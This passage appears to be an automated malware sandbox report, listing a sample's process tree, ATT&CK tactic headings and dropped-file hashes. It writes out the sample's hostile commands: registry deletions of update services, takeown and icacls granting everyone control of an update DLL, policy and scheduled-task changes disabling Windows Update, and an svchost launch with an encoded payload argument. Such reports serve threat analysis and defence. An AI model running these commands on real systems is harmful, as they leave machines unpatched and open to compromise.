          Modifies registry key
          PID:1336
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies registry key
          PID:1956
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:2884
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1536
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:4560
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:4516
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:3644
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:4412
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:1820
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:4424
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:4556
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:4912
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:4936
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:4580
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:3000
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:4420
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:4540
      • C:\Windows\System32\conhost.exe
        C:\Windows\System32\conhost.exe
        PID:2128
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "ayfzchqlcjzzno"
          PID:4380
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe hhmzomdryxklm1 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRSWr9mZW0WjQ8Zp6uvmLE6u5mJa6blLxbhLUBAH2hxKbhKEsyAtsV/R69zSzs3rP9kwrKtV5rbpmU/ciKPfPbhE9OKMMZXsI4UuRWZka8gS1s3HImYphWDV4wtqbeoHFj9g+eZNUoxfSBEn9L8w689dicSe5gi9g1CuCFLqyc7rwP/qjv/3JltIuH5LITKSCk7NXUnWeSDcKY+NEgVfPhJqoLEg0aeDg0KzxJrSUBDIJsbJWIc9iXONDbVMTVT325hS49GeGAI3OCMHKRR3rdOlsV6M9LUsKiFtUKe023Fiqki/2NFI17HEJ11UF+t6f3f98YUZokpWGVfv/F+VZIliwJaLVyzmm8cmJbvj/Kk9fw4aMKco/zTvKVFpN7WHBE5ihOAIdgLEtFFOECZ0VkdHbSg7zj8LXWP3XBDgZmT/PqsiIA0H3OwZNBjcY4rgjXQuml3y2wHeGb80pVVWBuMCIL8sCKDGpDbxiGDcBPcXfVWLdW+mS2VMIb3O/HlHhTYbdCuIHWH/bwUTs0vfQ83nR1mapBl3HhjShQnY40eZw0N1hMUMfCNjyNzWVgfBMhy9MwGaqnFJcQDpiYiVz61SrdLFCtpEnS3/kpJJXUzUBm0N2+JFiygLQGxw1SnSpP2EyTmdeaAN2uFWIS+BKCPJnp+Urs4ZIl3L86i6Tua4xkWIuaHTvQcBBqfq2BUHq/tLhHwx6yCrF/kfnl/5iXfLuCspUzlw6ZMz1cm2MDpBcOg1/gqzqrt+nyVDaTWBNnlqQtGRUYtUgvt5UXluuo835dbfAbWdkMMKIb7n2tZu2O5jsprX3nRnflrXNwa4aGTIlireC/ZpMF870p7vGDEFpva1T0Rd09ATLL1v8gEbuv8MViLO6cBi+L9jUR0yZfcdT7y8lHnRy/+8C79u/c9DjZfyQB8NJv62KZdxCwBzSeLR5MMSp11Y2skr66+YEXG2FRRWrXAlH2bZXv98TaPSbt0i43nk4Yz7s+ytCPFUNIeIoxV9ce2xdOpHqqFCtwT8eJ9EaMxFCuVWhNc9ECcQ2wJtJ2BTuhX2x4mJKeaQTai1sy8DVQYd52treWJZeQG+84IKsCqBOo4TZLL7GKMsSj+J3fMBL82oHYCVo/XwBH9fjo36EWBjibeA1qOBj3n8/hOcGirQ/WjUG5965/cSYWzjatv0njtxER7lnH9HMnXMsHXUpgPeDkQYQe8tWGkKJfOjKWvOKULJTdqwcjKrySMCAnwM23+lrIvjgkHDSFXzrE4bsgtfQQLgMvxtEV0uEXKS5q7oSkWyt2f8078oXmh5OhNyLJn6XCoGx/NQGZ8UxzjcKczeCotM0TNeWj+SABRXgkf1VUKrXmJ0CAlPIjguo+q4co87MqHySF8+C6J7s6n/f1l++/reoGTPOhnw7iNjxqQsdhFqi8WdxxhNztJR1CeWprsRqngRs4eZ0B2KyfMQDOnyRkBthFTsKUv8+JSQD5ORke/9r2kNBdlHH3NamvS16q1YsdXFYsvFCMrBnbCTsCu+tasasTw82VpHrmPvBHdUFcaccuCCLHfZL28RuT4oBeO3lR+nHIbW9b5laMXY0Dn9kqMFd7Vj66+/jyFUG1pVWHJgudOaJbM
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        PID:4544
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Privilege Escalation
Downloads
• C:\Program Files\Windows\services.exe
  MD5: 95104aa61ed30687c13e5c644d5722f3
  SHA1: f9788f808044d448f73203d93da0021cefb781ff
  SHA256: a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301
  SHA512: 99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce
• C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57